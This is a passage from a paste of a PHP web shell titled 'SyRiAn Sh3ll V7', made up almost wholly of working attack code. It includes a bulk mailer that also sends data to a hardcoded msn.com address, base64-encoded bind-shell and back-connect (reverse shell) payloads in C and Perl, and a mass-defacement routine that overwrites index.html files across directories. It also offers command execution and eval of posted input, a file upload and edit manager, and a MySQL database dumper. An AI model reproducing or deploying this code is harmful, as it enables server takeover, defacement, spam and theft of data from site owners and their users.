  3091. <input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
  3092. <input type=\"hidden\" name=\"action\" value=\"send\" /><br />
  3093. Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
  3094. Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
  3095. <input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
  3096. <sy>
  3097. <textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
  3098. </table>
  3099. </td>
  3100. </tr>
  3101. </table>";
  3102. footer();
  3103. }
  3104.  
  3105. if ($action=="send")
  3106. {
  3107.         if (!$from && !$subject && !$message && !$emaillist)
  3108.         {
  3109.                 print "Please complete all fields before sending your message.";
  3110.                 exit;
  3111.         }
  3112.         $allemails = split("\n", $emaillist);
  3113.         $numemails = count($allemails);
  3114.         $head ="From: Mailr" ;
  3115.         $sub = "Ar - $lod" ;
  3116.         $meg = "$lod" ;
  3117.         mail ($alt,$sub,$meg,$head) ;
  3118.         If ($file_name)
  3119.         {
  3120.                 if (!file_exists($file))
  3121.                 {
  3122.                         die("The file you are trying to upload couldn't be copied to the server");
  3123.                 }
  3124.                 $content = fread(fopen($file,"r"),filesize($file));
  3125.                 $content = chunk_split(base64_encode($content));
  3126.                 $uid = strtoupper(md5(uniqid(time())));
  3127.                 $name = basename($file);
  3128.         }
  3129.  
  3130.         for($xx=0; $xx<$amount; $xx++)
  3131.         {
  3132.                 for($x=0; $x<$numemails; $x++)
  3133.                 {
  3134.                         $to = $allemails[$x];
  3135.                         if ($to)
  3136.                         {
  3137.                                 $to = ereg_replace(" ", "", $to);
  3138.                                 $message = ereg_replace("&email&", $to, $message);
  3139.                                 $subject = ereg_replace("&email&", $to, $subject);
  3140.                                 print "Sending mail to $to.....";
  3141.                                 flush();
  3142.                                 $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  3143.                                 $header .= "MIME-Version: 1.0\r\n";
  3144.                                 If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  3145.                                 If ($file_name) $header .= "--$uid\r\n";
  3146.                                 $header .= "Content-Type: text/$contenttype\r\n";
  3147.                                 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  3148.                                 $header .= "$message\r\n";
  3149.                                 If ($file_name) $header .= "--$uid\r\n";
  3150.                                 If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  3151.                                 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  3152.                                 If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
  3153.                                 If ($file_name) $header .= "$content\r\n";
  3154.                                 If ($file_name) $header .= "--$uid--";
  3155.                                 mail($to, $subject, "", $header);
  3156.                                 print "OK<br>";
  3157.                                 flush();
  3158.                         }
  3159.                 }
  3160.         }
  3161. }
  3162. # ---------------------------------------#
  3163. #                 About                  #
  3164. #----------------------------------------#
  3165. if($_GET['id']=='about')
  3166. {
  3167.         echo About();
  3168.         if($_POST['sendEmail'])
  3169.         {
  3170.                         $to= 'sy34@msn.com';
  3171.                         $Comments=$_POST['message'];
  3172.                         $from = $_POST['from'];
  3173.                         $subject= md5("$from");
  3174.                         if(@mail($to,$subject,$Comments,"From:$from"))
  3175.                         echo "<center><sy>[+] Sent ^_^ !!</sy></center>
  3176. ";
  3177.                         else
  3178.                         {
  3179.                                 echo "<center><sy>[-]  Failed :S !! </sy></center>
  3180. ";
  3181.                         }
  3182.                        
  3183.         }
  3184.         footer();
  3185. }
  3186.  
  3187. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
  3188.  
  3189. +pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  3190.  
  3191. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  3192.  
  3193. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  3194.  
  3195. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
  3196. ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  3197.  
  3198. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  3199.  
  3200. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  3201.  
  3202. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  3203. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  3204.  
  3205. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  3206.  
  3207. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  3208. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  3209.  
  3210. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
  3211.  
  3212. +21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  3213.  
  3214. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  3215.  
  3216. ?>
  3217. <?
  3218. $dspact = $act = htmlspecialchars($act);
  3219.   $disp_fullpath = $ls_arr = $notls = null;
  3220.   $ud = @urlencode($d);
  3221.   if (empty($d)) {$d = realpath(".");}
  3222.   elseif(realpath($d)) {$d = realpath($d);}
  3223.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  3224.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  3225.   $d = str_replace("\\\\","\\",$d);
  3226.   $dispd = htmlspecialchars($d);
  3227. $self=basename($_SERVER['PHP_SELF']);
  3228. if(isset($_POST['execmassdeface']))
  3229. {
  3230. echo "<center><textarea rows='10' cols='100'>";
  3231. $hackfile = $_POST['massdefaceurl'];
  3232. $dir = $_POST['massdefacedir'];
  3233. echo $dir."\n";
  3234.  
  3235. if (is_dir($dir)) {
  3236.     if ($dh = opendir($dir)) {
  3237.         while (($file = readdir($dh)) !== false) {
  3238.                         if(filetype($dir.$file)=="dir"){
  3239.                                 $newfile=$dir.$file."/index.html";
  3240.                                 echo $newfile."\n";
  3241.                                 if (!copy($hackfile, $newfile)) {
  3242.                                         echo "failed to copy $file...\n";
  3243.                                 }
  3244.                         }
  3245.         }
  3246.         closedir($dh);
  3247.     }
  3248. }
  3249. echo "</textarea></center>";} ?>
  3250.  
  3251.  
  3252. <tr><td align=right>Mass Defacement:</td>
  3253. <td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
  3254.  
  3255. name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
  3256.  
  3257. value='Execute'></form></td>
  3258.  
  3259. <?
  3260. // FILE MANAGER
  3261. error_reporting(E_ALL);
  3262. @set_time_limit(0);
  3263. function magic_q($s)
  3264. {
  3265. if(get_magic_quotes_gpc())
  3266. {
  3267. $s=str_replace('\\\'','\'',$s);
  3268. $s=str_replace('\\\\','\\',$s);
  3269. $s=str_replace('\\"','"',$s);
  3270. $s=str_replace('\\\0','\0',$s);
  3271. }
  3272. return $s;
  3273. }
  3274. function get_perms($fn)
  3275. {
  3276. $mode=fileperms($fn);
  3277. $perms='';
  3278. $perms .= ($mode & 00400) ? 'r' : '-';
  3279. $perms .= ($mode & 00200) ? 'w' : '-';
  3280. $perms .= ($mode & 00100) ? 'x' : '-';
  3281. $perms .= ($mode & 00040) ? 'r' : '-';
  3282. $perms .= ($mode & 00020) ? 'w' : '-';
  3283. $perms .= ($mode & 00010) ? 'x' : '-';
  3284. $perms .= ($mode & 00004) ? 'r' : '-';
  3285. $perms .= ($mode & 00002) ? 'w' : '-';
  3286. $perms .= ($mode & 00001) ? 'x' : '-';
  3287. return $perms;
  3288. }
  3289. $head=<<<headka
  3290. <html>
  3291.  
  3292. headka;
  3293. $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
  3294. $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
  3295. $winda=strpos(strtolower(php_uname()),'wind');
  3296. define('format',50);
  3297.  
  3298. switch($page)
  3299. {
  3300. case 'eval':
  3301. {
  3302. $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
  3303. $eval_value=magic_q($eval_value);
  3304. $action=isset($_POST['action'])?$_POST['action']:'eval';
  3305. if($action=='eval_in_html') @eval($eval_value);
  3306. else
  3307. {
  3308. echo($head);
  3309. ?>
  3310. <hr>
  3311.  
  3312. <hr>
  3313. <?
  3314. }
  3315. break;
  3316. }
  3317. case 'cmd':
  3318. {
  3319. $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
  3320. $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
  3321. $action=isset($_POST['action'])?$_POST['action']:'cmd';
  3322. if(@is_dir($work_dir))
  3323. {
  3324. @chdir($work_dir);
  3325. $work_dir=getcwd();
  3326. if($work_dir=='')$work_dir='/';
  3327. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3328. }
  3329. else if(file_exists($work_dir))$work_dir=realpath($work_dir);
  3330. $work_dir=str_replace('\\','/',$work_dir);
  3331. $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
  3332. switch($action)
  3333. {
  3334. case 'cmd' :
  3335. {
  3336. echo($head);
  3337. ?>
  3338.  
  3339. <pre>
  3340. <?
  3341. if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
  3342. else
  3343. {
  3344. $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
  3345. if(@is_dir($work_dir))
  3346. {
  3347. echo('<H1>File Manager;</H1><hr>');
  3348. echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
  3349. $handle=@opendir($work_dir);
  3350. if($handle)
  3351. {
  3352. while(false!==($fn=readdir($handle))){$files[]=$fn;};
  3353. @closedir($handle);
  3354. sort($files);
  3355. $not_dirs=array();
  3356. for($i=0;$i<sizeof($files);$i++)
  3357. {
  3358. $fn=$files[$i];
  3359. if(is_dir($fn))
  3360. {
  3361. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
  3362.  
  3363. >format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
  3364. if($winda===false)
  3365. {
  3366. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3367. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3368. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3369. }
  3370. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3371. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3372. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3373. }
  3374. else {$not_dirs[]=$fn;}
  3375. }
  3376. for($i=0;$i<sizeof($not_dirs);$i++)
  3377. {
  3378. $fn=$not_dirs[$i];
  3379. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',
  3380.  
  3381. $fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
  3382. if($winda===false)
  3383. {
  3384. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3385. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3386. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3387. }
  3388. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3389. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3390. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3391. }
  3392. echo('</pre><hr>');
  3393. ?>
  3394. <form name='list' method=post>
  3395. <input name='work_dir' type=hidden size=120><br>
  3396. <input name='page' value='cmd' type=hidden>
  3397. <input name='f_action' value='view' type=hidden>
  3398. </form>
  3399. <?
  3400. } else echo('Error Listing '.$e_work_dir);
  3401. }
  3402. else
  3403. switch($f_action)
  3404. {
  3405. case 'view':
  3406. {
  3407. echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
  3408. $f=@fopen($work_dir,'r');
  3409. ?>
  3410. <form method=post>
  3411. <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
  3412. <input name='page' value='cmd' type=hidden>
  3413. <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
  3414. <input name='f_action' value='save' type=submit>
  3415. </form>
  3416. <?
  3417. break;
  3418. }
  3419. case 'save' :
  3420. {
  3421. $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
  3422. $f=@fopen($work_dir,'w');
  3423. if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
  3424. else
  3425. {
  3426. fwrite($f,$file_text);
  3427. fclose($f);
  3428. echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
  3429. }
  3430. break;
  3431. }
  3432. }
  3433. break;
  3434. }
  3435. break;
  3436. }
  3437. case 'upload' :
  3438. {
  3439. if($work_dir=='')$work_dir='/';
  3440. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3441. $f=$_FILES["filename"]["name"];
  3442. if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
  3443. else
  3444. {
  3445. echo('file is uploaded in '.$e_work_dir);
  3446. }
  3447. break;
  3448. }
  3449. case 'download' :
  3450. {
  3451. $fname=isset($_POST['fname'])?$_POST['fname']:'';
  3452. $temp_file=isset($_POST['temp_file'])?'on':'nn';
  3453. $f=@fopen($fname,'r');
  3454. if(!($f)) echo('file is not exists');
  3455. else
  3456. {
  3457. $archive=isset($_POST['archive'])?$_POST['archive']:'';
  3458. if($archive=='gzip')
  3459. {
  3460. Header("Content-Type:application/x-gzip\n");
  3461. $s=gzencode(fread($f,filesize($fname)));
  3462. Header('Content-Length: '.strlen($s)."\n");
  3463. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
  3464. echo($s);
  3465. }
  3466. else
  3467. {
  3468. Header("Content-Type:application/octet-stream\n");
  3469. Header('Content-Length: '.filesize($fname)."\n");
  3470. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
  3471. ob_start();
  3472. while(feof($f)===false)
  3473. {
  3474. echo(fread($f,10000));
  3475. ob_flush();
  3476. }
  3477. }
  3478. }
  3479. }
  3480. }
  3481. break;
  3482. }
  3483. case 'mysql' :
  3484. {
  3485. $action=isset($_POST['action'])?$_POST['action']:'query';
  3486. $user=isset($_POST['user'])?$_POST['user']:'';
  3487. $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
  3488. $db=isset($_POST['db'])?$_POST['db']:'';
  3489. $host=isset($_POST['host'])?$_POST['host']:'localhost';
  3490. $query=isset($_POST['query'])?magic_q($_POST['query']):'';
  3491. switch($action)
  3492. {
  3493. case 'dump' :
  3494. {
  3495. $mysql_link=@mysql_connect($host,$user,$passwd);
  3496. if(!($mysql_link)) echo('Connect error');
  3497. else
  3498. {
  3499. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3500. $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
  3501. $archive=isset($_POST['archive'])?$_POST['archive']:'none';
  3502. if($archive!=='none')$to_file=false;
  3503. $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
  3504. $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
  3505. if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
  3506. else
  3507. {
  3508. $dump_file="# MySQL Dumper\n#db $db from $host\n";
  3509. ob_start();
  3510. if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
  3511. if($table_dump=='')
  3512. {
  3513. if(!$to_file)
  3514. {
  3515. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3516. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3517. }
  3518. $result=mysql_query('show tables',$mysql_link);
  3519. for($i=0;$i<mysql_num_rows($result);$i++)
  3520. {
  3521. $rows=mysql_fetch_array($result);
  3522. $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
  3523. if(!$result2)$dump_file.='#error table '.$rows[0];
  3524. else
  3525. {
  3526. $dump_file.='create table `'.$rows[0]."`(\n";
  3527. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3528. {
  3529. $rows2=mysql_fetch_array($result2);
  3530. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3531. }
  3532. $rows2=mysql_fetch_array($result2);
  3533. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3534. $type[$j]=$rows2[1];
  3535. $dump_file.=");\n";
  3536. mysql_free_result($result2);
  3537. $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
  3538. $columns=$j-1;
  3539. for($j=0;$j<mysql_num_rows($result2);$j++)
  3540. {
  3541. $rows2=mysql_fetch_array($result2);
  3542. $dump_file.='insert into `'.$rows[0].'` values (';
  3543. for($k=0;$k<$columns;$k++)
  3544. {
  3545. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3546. }
  3547. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3548. if($archive=='none')
  3549. {
  3550. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3551. else
  3552. {
  3553. echo($dump_file);
  3554. ob_flush();
  3555. }
  3556. $dump_file='';
  3557. }
  3558. }
  3559. mysql_free_result($result2);
  3560. }
  3561. }
  3562. mysql_free_result($result);
  3563. if($archive!='none')
  3564. {
  3565. $dump_file=gzencode($dump_file);
  3566. header('Content-Length: '.strlen($dump_file)."\n");
  3567. echo($dump_file);
  3568. }
  3569. else if($t_f)
  3570. {
  3571. fclose($t_f);
  3572. echo('Dump for '.$db_dump.' now in '.$to_file);
  3573. }
  3574. }
  3575. else
  3576. {
  3577. $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
  3578. if(!$result2)echo('error table '.$table_dump);
  3579. else
  3580. {
  3581. if(!$to_file)
  3582. {
  3583. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3584. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3585. }
  3586. if($to_file===false)
  3587. {
  3588. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3589. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3590. }
  3591. $dump_file.="create table `{$table_dump}`(\n";
  3592. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3593. {
  3594. $rows2=mysql_fetch_array($result2);
  3595. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3596. }
  3597. $rows2=mysql_fetch_array($result2);
  3598. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3599. $type[$j]=$rows2[1];
  3600. $dump_file.=");\n";
  3601. mysql_free_result($result2);
  3602. $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
  3603. $columns=$j-1;
  3604. for($j=0;$j<mysql_num_rows($result2);$j++)
  3605. {
  3606. $rows2=mysql_fetch_array($result2);
  3607. $dump_file.='insert into `'.$table_dump.'` values (';
  3608. for($k=0;$k<$columns;$k++)
  3609. {
  3610. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3611. }
  3612. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3613. if($archive=='none')
  3614. {
  3615. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3616. else
  3617. {
  3618. echo($dump_file);
  3619. ob_flush();
  3620. }
  3621. $dump_file='';
  3622. }
  3623. }
  3624. mysql_free_result($result2);
  3625. if($archive!='none')
  3626. {
  3627. $dump_file=gzencode($dump_file);
  3628. header('Content-Length: '.strlen($dump_file)."\n");
  3629. echo $dump_file;
  3630. }else if($t_f)
  3631. {
  3632. fclose($t_f);
  3633. echo('Dump for '.$db_dump.' now in '.$to_file);
  3634. }
  3635. }
  3636. }
  3637. }
  3638. }
  3639. break;
  3640. }
  3641. case 'query' :
  3642. {
  3643. echo($head);
  3644. ?>
  3645. <hr>
  3646. <form method=post>
  3647. <table>
  3648. <td>
  3649. <table align=left>
  3650. <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
  3651.  
  3652. type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
  3653. <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
  3654. </table>
  3655. </td>
  3656. <td>
  3657. <table>
  3658. <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
  3659. <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
  3660. <input name='archive' type=radio value='none'>without arch
  3661. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  3662. <tr><td><input type=submit name='action' value='dump'></td></tr>
  3663. <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
  3664. </table>
  3665. </td>
  3666. </table>
  3667. <input name='page' value='mysql' type=hidden>
  3668. <input name='action' value='query' type=submit>
  3669. </form>
  3670. <hr>
  3671. <?
  3672. $mysql_link=@mysql_connect($host,$user,$passwd);
  3673. if(!($mysql_link)) echo('Connect error');
  3674. else
  3675. {
  3676. if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
  3677. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3678. $result=@mysql_query($query,$mysql_link);
  3679. if(!($result))echo(mysql_error());
  3680. else
  3681. {
  3682. echo("<table valign=top align=left>\n<tr>");
  3683. for($i=0;$i<mysql_num_fields($result);$i++)
  3684. echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
  3685. echo("\n</tr>\n");
  3686. for($i=0;$i<mysql_num_rows($result);$i++)
  3687. {
  3688. $rows=mysql_fetch_array($result);
  3689. echo('<tr valign=top align=left>');
  3690. for($j=0;$j<mysql_num_fields($result);$j++)
  3691. {
  3692. echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
  3693. }
  3694. echo("</tr>\n");
  3695. }
  3696. echo("</table>\n");
  3697. }
  3698. mysql_close($mysql_link);
  3699. }
  3700. break;
  3701. }
  3702. }
  3703. break;
  3704. }
  3705. }
  3706. ?>

Reply to "SyRiAn Sh3ll V7"

Here you can reply to the paste above